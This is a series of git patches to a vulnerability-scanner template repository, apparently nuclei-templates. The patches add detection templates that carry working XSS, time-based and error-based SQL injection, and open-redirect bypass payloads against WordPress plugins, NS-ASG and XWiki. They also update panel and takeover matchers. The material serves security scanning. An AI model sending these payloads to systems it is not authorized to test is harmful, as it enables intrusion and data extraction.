b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2022/CVE-2022-45269.yaml' - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' From e1e4855c20b139600fd7935faf9a3d37ba0c02f4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 11:06:55 +0000 Subject: [PATCH 1135/1841] Auto Template Signing [Thu Jul 11 11:06:55 UTC 2024] :robot: --- http/cves/2022/CVE-2022-45269.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-45269.yaml b/http/cves/2022/CVE-2022-45269.yaml index 034a50c08d..382b467eff 100644 --- a/http/cves/2022/CVE-2022-45269.yaml +++ b/http/cves/2022/CVE-2022-45269.yaml @@ -39,3 +39,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100e41332608c7eb41673c7ccc760e661b7ee1682c3b66657f1083139b73b589b3302200d2d8767fbcfb0cd5bacdc48f0dde25a600b06ac775ee14b5d23be286c8be450:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fed4fae646d6626245840b07df40d644aae8426a Mon Sep 17 00:00:00 2001 From: Youngho Kim Date: Thu, 11 Jul 2024 20:49:48 +0900 Subject: [PATCH 1136/1841] Add 'error.ghost.org' to Ghost.io takeover --- http/takeovers/ghost-takeover.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index a29c5b833f..33f93397a4 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word part: header words: + - 'error.ghost.org' - 'offline.ghost.org' - type: status @@ -35,4 +36,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" -# digest: 4a0a00473045022100ef6e9387b76c6b0d10b0bb7578cabcb6318183cb7aa0a96921c7cccb3d23f19f02205779e8fdd4e525c1f6fdb6d24bdf06d512233517910e22958b12fa01ba90f2c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef6e9387b76c6b0d10b0bb7578cabcb6318183cb7aa0a96921c7cccb3d23f19f02205779e8fdd4e525c1f6fdb6d24bdf06d512233517910e22958b12fa01ba90f2c5:922c64590222798bb761d5b6d8e72950 From 186996f442410b875731488022d7974b7b003d2c Mon Sep 17 00:00:00 2001 From: Youngho Kim Date: Thu, 11 Jul 2024 20:56:26 +0900 Subject: [PATCH 1137/1841] Add condition --- http/takeovers/ghost-takeover.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index 33f93397a4..d38eab7619 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -27,6 +27,7 @@ http: words: - 'error.ghost.org' - 'offline.ghost.org' + condition: or - type: status status: From 69cabc4528d141f1156ca6431bbe007ed158d6d5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 12:43:19 +0000 Subject: [PATCH 1139/1841] Auto Generated Templates Checksum [Thu Jul 11 12:43:19 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 32ad59b48b..9df343d362 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2953,7 +2953,7 @@ http/cves/2022/CVE-2022-44952.yaml:c629ee34322ee56610296866a376746cae941860 http/cves/2022/CVE-2022-44957.yaml:097dbdc04c9ec9d0a8917061295cb399d2eb77e8 http/cves/2022/CVE-2022-45037.yaml:6abb4c091e036c9d52b7c996e0c26d9531ba8f4a http/cves/2022/CVE-2022-45038.yaml:d2503018ebb3d9883bc8ed21f43e67f15422aae5 -http/cves/2022/CVE-2022-45269.yaml:42c23aec173e5c280fc5e053fb6f3773c06a0202 +http/cves/2022/CVE-2022-45269.yaml:917d3565d19ef490508b45c7370fe78855755525 http/cves/2022/CVE-2022-45354.yaml:e3388e631771c460f4ce83eab6279d2497c2e190 http/cves/2022/CVE-2022-45362.yaml:ade84fe7804fdef6dfb1718899ac3b1917cfc679 http/cves/2022/CVE-2022-45365.yaml:f637eb5c57aab39ea572b90b5f0c5519f06e8ed1 @@ -6806,7 +6806,7 @@ http/takeovers/flexbe-takeover.yaml:617163c63ffb59ec2f94d4d5fd7995f27b261f1a http/takeovers/frontify-takeover.yaml:8e7b5944d4ea9cd2bfe1c0a53c3f4afb8cd1c5e1 http/takeovers/gemfury-takeover.yaml:99b2b5e97eb4d80e85058d39901e90611ba65fef http/takeovers/getresponse-takeover.yaml:3a585afe9dd14bb01f7a50f731c88bc14e2e45db -http/takeovers/ghost-takeover.yaml:58f195a61e50b65af5dcd5450a72b997c792c5ab +http/takeovers/ghost-takeover.yaml:c5db48048e83b4fa1a15b1493ff3ab5ad62c33cc http/takeovers/gitbook-takeover.yaml:92f9bbccaed9efd292242faf2c71df9c3eafb2dc http/takeovers/github-takeover.yaml:386272c1ca1c25f4611d5bce83ea3655b7a40273 http/takeovers/gohire-takeover.yaml:b2142614c80428b9e20d4d1f7c578f37bac2569f @@ -8868,7 +8868,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:00c5eea4535afc542fbd095a5206e4b52ede0bea +templates-checksum.txt:00f9ac5ff7e60a1926d41ecef62b601de76a6738 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 00c6040fa646ad77774765571846523e0cb70a8c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 12:45:03 +0000 Subject: [PATCH 1140/1841] Auto Template Signing [Thu Jul 11 12:45:03 UTC 2024] :robot: --- http/takeovers/ghost-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index d38eab7619..ca4d085199 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -37,4 +37,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" -# digest: 4a0a00473045022100ef6e9387b76c6b0d10b0bb7578cabcb6318183cb7aa0a96921c7cccb3d23f19f02205779e8fdd4e525c1f6fdb6d24bdf06d512233517910e22958b12fa01ba90f2c5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207d91f932ce2ed1fc8924b00af9eb0c421fc0b92e0853f8fba2bae8afbbadea8a022100bf5af14ddb7c21368dd33249a39ab3b3932b4b75d1abb3bb8f75367529854309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From bbba105bda8489387f74a7c7a78c65172e0c6319 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 11 Jul 2024 16:14:35 +0300 Subject: [PATCH 1141/1841] add CVE-2023-2309 --- http/cves/2023/CVE-2023-2309.yaml | 39 +++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2309.yaml diff --git a/http/cves/2023/CVE-2023-2309.yaml b/http/cves/2023/CVE-2023-2309.yaml new file mode 100644 index 0000000000..81ecac34b4 --- /dev/null +++ b/http/cves/2023/CVE-2023-2309.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-2309 + +info: + name: wpForo Forum <= 2.1.8 - Cross-Site Scripting + author: securityforeveryone + severity: medium + description: | + The wpForo Forum plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘wpforo_debug’ function in versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + remediation: Fixed in 2.1.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-2309 + - https://wpscan.com/vulnerability/1b3f4558-ea41-4749-9aa2-d3971fc9ca0d/ + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo/wpforo-forum-218-reflected-cross-site-scripting-via-wpforo-debug + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-2309 + epss-score: 0.00052 + epss-percentile: 0.20645 + cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: gvectors + product: wpforo_forum + framework: wordpress + tags: xss,wpscan,cve,cve2023,wp-plugin + +http: + - raw: + - | + GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"") && contains(header,"text/html")' + - 'status_code == 200' + condition: and From 2dfc775ed7ea5957a5e39ed94830463fc7240180 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 11 Jul 2024 17:11:16 +0300 Subject: [PATCH 1142/1841] add CVE-2024-1512 --- http/cves/2024/CVE-2024-1512.yaml | 44 +++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1512.yaml diff --git a/http/cves/2024/CVE-2024-1512.yaml b/http/cves/2024/CVE-2024-1512.yaml new file mode 100644 index 0000000000..63f6a87343 --- /dev/null +++ b/http/cves/2024/CVE-2024-1512.yaml @@ -0,0 +1,44 @@ +id: CVE-2024-1512 + +info: + name: MasterStudy LMS WordPress Plugin <= 3.2.5 - SQL Injection + author: securityforeveryone + severity: critical + description: | + The MasterStudy LMS WordPress Plugin for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in 3.2.6 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-1512 + - https://github.com/rat-c/CVE-2024-1512 + - https://blog.csdn.net/m0_60571842/article/details/139901296 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6b6d824-51d3-4da9-a39a-b957368df4dc?source=cve + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-1512 + epss-score: 0.00043 + epss-percentile: 0.09257 + metadata: + verified: true + max-request: 2 + vendor: stylemixthemes + product: masterstudy_lms + framework: wordpress + fofa-query: body="wp-content/plugins/masterstudy-lms-learning-management-system/" + tags: cve,cve2024,sqli,wp-plugin,wordpress + +http: + - raw: + - | + @timeout 30s + GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains_all(body,"items","total","total_price") && contains(header,"application/json")' + - 'status_code == 200' + condition: and From 80737f13c62240857a8d816c5f3755a617fee355 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Thu, 11 Jul 2024 17:28:46 +0200 Subject: [PATCH 1143/1841] Update gradle-cache-node-detect.yaml --- .../gradle/gradle-cache-node-detect.yaml | 22 +++++++++++-------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/http/exposed-panels/gradle/gradle-cache-node-detect.yaml b/http/exposed-panels/gradle/gradle-cache-node-detect.yaml index b507605d4c..d4a3b93d62 100644 --- a/http/exposed-panels/gradle/gradle-cache-node-detect.yaml +++ b/http/exposed-panels/gradle/gradle-cache-node-detect.yaml @@ -2,32 +2,36 @@ id: gradle-cache-node-detect info: name: Gradle Enterprise Build Cache Node Login Panel - Detect - author: Adam Crosser + author: Adam Crosser,righettod severity: info description: Gradle Enterprise Build Cache Node login panel was detected. reference: - - https://gradle.com + - https://gradle.com/gradle-enterprise-solutions/build-cache/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,gradle,cache + verified: true + shodan-query: http.html:"Gradle Enterprise Build Cache Node" + tags: panel,gradle,detect http: - method: GET path: - - '{{BaseURL}}' + - "{{BaseURL}}" matchers: - - type: regex - regex: - - "Gradle Enterprise Build Cache Node (.*)" + - type: dsl + dsl: + - 'status_code == 200 || status_code == 401' + - 'contains_any(to_lower(body), "gradle enterprise build cache node", "com.gradle.error.fallback")' + condition: and extractors: - type: regex part: body group: 1 regex: - - "Gradle Enterprise Build Cache Node (.*)" -# digest: 4b0a004830460221008dbdc2d78f296e38531085c0f85a1047485cad55a664d50c4c809349f0932728022100be5036f154a06dc26a667d3600144487619fd4d8c4df4f4936e1dd768710f0e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?i)"applicationVersion":"([0-9.]+)"' + - '(?i)Gradle\s+Enterprise\s+Build\s+Cache\s+Node\s+([0-9.]+)' From 18fd01a5711ce637a4633b82341b012d92193118 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 11 Jul 2024 18:30:35 +0300 Subject: [PATCH 1144/1841] add CVE-2024-2330 --- http/cves/2024/CVE-2024-2330.yaml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-2330.yaml diff --git a/http/cves/2024/CVE-2024-2330.yaml b/http/cves/2024/CVE-2024-2330.yaml new file mode 100644 index 0000000000..5a340c44ae --- /dev/null +++ b/http/cves/2024/CVE-2024-2330.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-2330 + +info: + name: NS-ASG Application Security Gateway 6.3 - Sql Injection + author: securityforeveryone + severity: medium + description: | + A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-2330 + - https://nvd.nist.gov/vuln/detail/CVE-2024-2330 + - https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md + - https://vuldb.com/?ctiid.256281 + - https://vuldb.com/?id.256281 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-2330 + cwe-id: CWE-89 + epss-score: 0.00045 + epss-percentile: 0.15866 + metadata: + max-request: 2 + shodan-query: http.title:“NS-ASG” + fofa-query: app="网康科技-NS-ASG安全网关" + tags: cve,cve2024,ns-asg,sqli + +http: + - raw: + - | + POST /protocol/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"XPATH syntax error:","alert") && contains(header,"text/html")' + - 'status_code == 200' + condition: and From c3523f269b595e8a110d8ab771f551e48ed290ea Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Thu, 11 Jul 2024 17:30:43 +0200 Subject: [PATCH 1145/1841] Better filtering of old IE-only http scripts --- http/misconfiguration/mixed-active-content.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/mixed-active-content.yaml b/http/misconfiguration/mixed-active-content.yaml index 74bcc5d873..5bdbf3caee 100644 --- a/http/misconfiguration/mixed-active-content.yaml +++ b/http/misconfiguration/mixed-active-content.yaml @@ -28,7 +28,7 @@ http: part: body negative: true regex: - - "(?mi)" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "", "OpenGraph no video")' + - 'status_code == 200 || status_code == 500' + - 'contains(header, "text/html")' + condition: and From bf11ca445164857043f784888af06b2ba672734a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 13 Jul 2024 20:58:41 +0530 Subject: [PATCH 1197/1841] Create CVE-2023-29204.yaml --- http/cves/2023/CVE-2023-29204.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-29204.yaml diff --git a/http/cves/2023/CVE-2023-29204.yaml b/http/cves/2023/CVE-2023-29204.yaml new file mode 100644 index 0000000000..42aef997f6 --- /dev/null +++ b/http/cves/2023/CVE-2023-29204.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-29204 + +info: + name: XWiki - Open Redirect + author: ritikchaddha + severity: medium + description: | + XWiki Commons are technical libraries common to several other top level XWiki projects. It is possible to bypass the existing security measures put in place to avoid open redirect by using a redirect such as `//mydomain.com` (i.e. omitting the `http:`). It was also possible to bypass it when using URL such as `http:/mydomain.com`. The problem has been patched on XWiki 13.10.10, 14.4.4 and 14.8RC1. + impact: | + An attacker can redirect users to malicious websites, leading to phishing attacks or malware downloads. + remediation: | + Implement proper input validation and sanitize user-controlled input to prevent open redirect vulnerabilities. + reference: + - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-xwph-x6xj-wggv + - https://jira.xwiki.org/browse/XWIKI-10309 + - https://jira.xwiki.org/browse/XWIKI-19994 + - https://nvd.nist.gov/vuln/detail/CVE-2023-29204 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-29204 + cwe-id: CWE-601 + epss-score: 0.00094 + epss-percentile: 0.39237 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2023,xwiki,redirect + +http: + - method: GET + path: + - "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me" + - "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 From 95d81675a330fb4aae0fbed28fe03a2a21ea8fda Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jul 2024 00:22:21 +0000 Subject: [PATCH 1198/1841] Auto WordPress Plugins Update [Sun Jul 14 00:22:21 UTC 2024] :robot: --- .../wordpress/plugins/stops-core-theme-and-plugin-updates.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt b/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt index 5eeb3f978c..f12f145375 100644 --- a/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt +++ b/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt @@ -1 +1 @@ -9.0.17 \ No newline at end of file +9.0.18 \ No newline at end of file From 61b6c1dc30a0c930e593193f1f1d2b4b2844ff9c Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 14 Jul 2024 09:41:09 +0200 Subject: [PATCH 1199/1841] Add files via upload --- http/exposed-panels/falcosidekick-panel.yaml | 26 ++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 http/exposed-panels/falcosidekick-panel.yaml diff --git a/http/exposed-panels/falcosidekick-panel.yaml b/http/exposed-panels/falcosidekick-panel.yaml new file mode 100644 index 0000000000..a0115c36a4 --- /dev/null +++ b/http/exposed-panels/falcosidekick-panel.yaml @@ -0,0 +1,26 @@ +id: falcosidekick-panel + +info: + name: Falcosidekick UI Login Panel - Detect + author: righettod + severity: info + description: Falcosidekick UI login panel was detected. + reference: + - https://github.com/falcosecurity/falcosidekick-ui + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"Falcosidekick" + tags: panel,falco,detect,login + +http: + - method: GET + path: + - '{{BaseURL}}/login/' + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "falcosidekick ui", "falcosidekick-ui")' + condition: and \ No newline at end of file From 64cbf97e14ddf184d967abc024fae9dc71b30fe5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 14 Jul 2024 13:36:22 +0530 Subject: [PATCH 1200/1841] updated domain --- .../redirect/open-redirect.yaml | 4 +- .../generic/open-redirect-generic.yaml | 184 +++++++++--------- 2 files changed, 94 insertions(+), 94 deletions(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 47d693a75a..50d350f14d 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -16,7 +16,7 @@ http: payloads: redirect: - - "example.com" + - "oast.me" fuzzing: - part: query @@ -174,7 +174,7 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 - type: status status: diff --git a/http/vulnerabilities/generic/open-redirect-generic.yaml b/http/vulnerabilities/generic/open-redirect-generic.yaml index dbb5973f19..c3d8e7880f 100644 --- a/http/vulnerabilities/generic/open-redirect-generic.yaml +++ b/http/vulnerabilities/generic/open-redirect-generic.yaml @@ -20,99 +20,99 @@ http: payloads: redirect: - - '%0a/example.com/' - - '%0d/example.com/' - - '%00/example.com/' - - '%09/example.com/' - - '%5C%5Cexample.com/%252e%252e%252f' - - '%5Cexample.com' - - '%5cexample.com/%2f%2e%2e' - - '%5c{{RootURL}}example.com/%2f%2e%2e' - - '../example.com' - - '.example.com' - - '/%5cexample.com' - - '////\;@example.com' - - '////example.com' - - '///example.com' - - '///example.com/%2f%2e%2e' - - '///example.com@//' - - '///{{RootURL}}example.com/%2f%2e%2e' - - '//;@example.com' - - '//\/example.com/' - - '//\@example.com' - - '//\example.com' - - '//\texample.com/' - - '//example.com/%2F..' - - '//example.com//' + - '%0a/oast.me/' + - '%0d/oast.me/' + - '%00/oast.me/' + - '%09/oast.me/' + - '%5C%5Coast.me/%252e%252e%252f' + - '%5Coast.me' + - '%5coast.me/%2f%2e%2e' + - '%5c{{RootURL}}oast.me/%2f%2e%2e' + - '../oast.me' + - '.oast.me' + - '/%5coast.me' + - '////\;@oast.me' + - '////oast.me' + - '///oast.me' + - '///oast.me/%2f%2e%2e' + - '///oast.me@//' + - '///{{RootURL}}oast.me/%2f%2e%2e' + - '//;@oast.me' + - '//\/oast.me/' + - '//\@oast.me' + - '//\oast.me' + - '//\toast.me/' + - '//oast.me/%2F..' + - '//oast.me//' - '//%69%6e%74%65%72%61%63%74%2e%73%68' - - '//example.com@//' - - '//example.com\texample.com/' - - '//https://example.com//' - - '/<>//example.com' - - '/\/\/example.com/' - - '/\/example.com' - - '/\example.com' - - '/example.com' - - '/example.com/%2F..' - - '/example.com/' - - '/example.com/..;/css' - - '/https:example.com' - - '/{{RootURL}}example.com/' - - '/〱example.com' - - '/〵example.com' - - '/ゝexample.com' - - '/ーexample.com' - - '/ーexample.com' - - '<>//example.com' - - '@example.com' - - '@https://example.com' - - '\/\/example.com/' + - '//oast.me@//' + - '//oast.me\toast.me/' + - '//https://oast.me//' + - '/<>//oast.me' + - '/\/\/oast.me/' + - '/\/oast.me' + - '/\oast.me' + - '/oast.me' + - '/oast.me/%2F..' + - '/oast.me/' + - '/oast.me/..;/css' + - '/https:oast.me' + - '/{{RootURL}}oast.me/' + - '/〱oast.me' + - '/〵oast.me' + - '/ゝoast.me' + - '/ーoast.me' + - '/ーoast.me' + - '<>//oast.me' + - '@oast.me' + - '@https://oast.me' + - '\/\/oast.me/' - 'example%E3%80%82com' - - 'example.com' - - 'example.com/' - - 'example.com//' - - 'example.com;@' - - 'https%3a%2f%2fexample.com%2f' - - 'https:%0a%0dexample.com' - - 'https://%0a%0dexample.com' - - 'https://%09/example.com' - - 'https://%2f%2f.example.com/' - - 'https://%3F.example.com/' - - 'https://%5c%5c.example.com/' - - 'https://%5cexample.com@' - - 'https://%23.example.com/' - - 'https://.example.com' - - 'https://////example.com' - - 'https:///example.com' - - 'https:///example.com/%2e%2e' - - 'https:///example.com/%2f%2e%2e' - - 'https:///example.com@example.com/%2e%2e' - - 'https:///example.com@example.com/%2f%2e%2e' - - 'https://:80#@example.com/' - - 'https://:80?@example.com/' - - 'https://:@\@example.com' - - 'https://:@example.com\@example.com' - - 'https://;@example.com' - - 'https://\texample.com/' - - 'https://example.com/example.com' - - 'https://example.com/https://example.com/' - - 'https://www.\.example.com' - - 'https:/\/\example.com' - - 'https:/\example.com' - - 'https:/example.com' - - 'https:example.com' - - '{{RootURL}}example.com' - - '〱example.com' - - '〵example.com' - - 'ゝexample.com' - - 'ーexample.com' - - 'ーexample.com' - - 'redirect/example.com' - - 'cgi-bin/redirect.cgi?example.com' - - 'out?example.com' - - 'login?to=http://example.com' - - '1/_https@example.com' - - 'redirect?targeturl=https://example.com' + - 'oast.me' + - 'oast.me/' + - 'oast.me//' + - 'oast.me;@' + - 'https%3a%2f%2foast.me%2f' + - 'https:%0a%0doast.me' + - 'https://%0a%0doast.me' + - 'https://%09/oast.me' + - 'https://%2f%2f.oast.me/' + - 'https://%3F.oast.me/' + - 'https://%5c%5c.oast.me/' + - 'https://%5coast.me@' + - 'https://%23.oast.me/' + - 'https://.oast.me' + - 'https://////oast.me' + - 'https:///oast.me' + - 'https:///oast.me/%2e%2e' + - 'https:///oast.me/%2f%2e%2e' + - 'https:///oast.me@oast.me/%2e%2e' + - 'https:///oast.me@oast.me/%2f%2e%2e' + - 'https://:80#@oast.me/' + - 'https://:80?@oast.me/' + - 'https://:@\@oast.me' + - 'https://:@oast.me\@oast.me' + - 'https://;@oast.me' + - 'https://\toast.me/' + - 'https://oast.me/oast.me' + - 'https://oast.me/https://oast.me/' + - 'https://www.\.oast.me' + - 'https:/\/\oast.me' + - 'https:/\oast.me' + - 'https:/oast.me' + - 'https:oast.me' + - '{{RootURL}}oast.me' + - '〱oast.me' + - '〵oast.me' + - 'ゝoast.me' + - 'ーoast.me' + - 'ーoast.me' + - 'redirect/oast.me' + - 'cgi-bin/redirect.cgi?oast.me' + - 'out?oast.me' + - 'login?to=http://oast.me' + - '1/_https@oast.me' + - 'redirect?targeturl=https://oast.me' stop-at-first-match: true @@ -121,7 +121,7 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: From 31d5e16128a034293db3ec5cc74bd0a9f5433a4f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 14 Jul 2024 13:41:38 +0530 Subject: [PATCH 1201/1841] updated payload --- http/vulnerabilities/generic/open-redirect-generic.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/generic/open-redirect-generic.yaml b/http/vulnerabilities/generic/open-redirect-generic.yaml index c3d8e7880f..025d5a3294 100644 --- a/http/vulnerabilities/generic/open-redirect-generic.yaml +++ b/http/vulnerabilities/generic/open-redirect-generic.yaml @@ -44,7 +44,7 @@ http: - '//\toast.me/' - '//oast.me/%2F..' - '//oast.me//' - - '//%69%6e%74%65%72%61%63%74%2e%73%68' + - '//%6f%61%73%74%2e%6d%65' - '//oast.me@//' - '//oast.me\toast.me/' - '//https://oast.me//' @@ -67,7 +67,7 @@ http: - '@oast.me' - '@https://oast.me' - '\/\/oast.me/' - - 'example%E3%80%82com' + - 'oast%E3%80%82me' - 'oast.me' - 'oast.me/' - 'oast.me//' From d380f92f39ca531e7871d5b14b962546a934b2ad Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jul 2024 08:15:11 +0000 Subject: [PATCH 1203/1841] Auto Generated Templates Checksum [Sun Jul 14 08:15:11 UTC 2024] :robot: --- 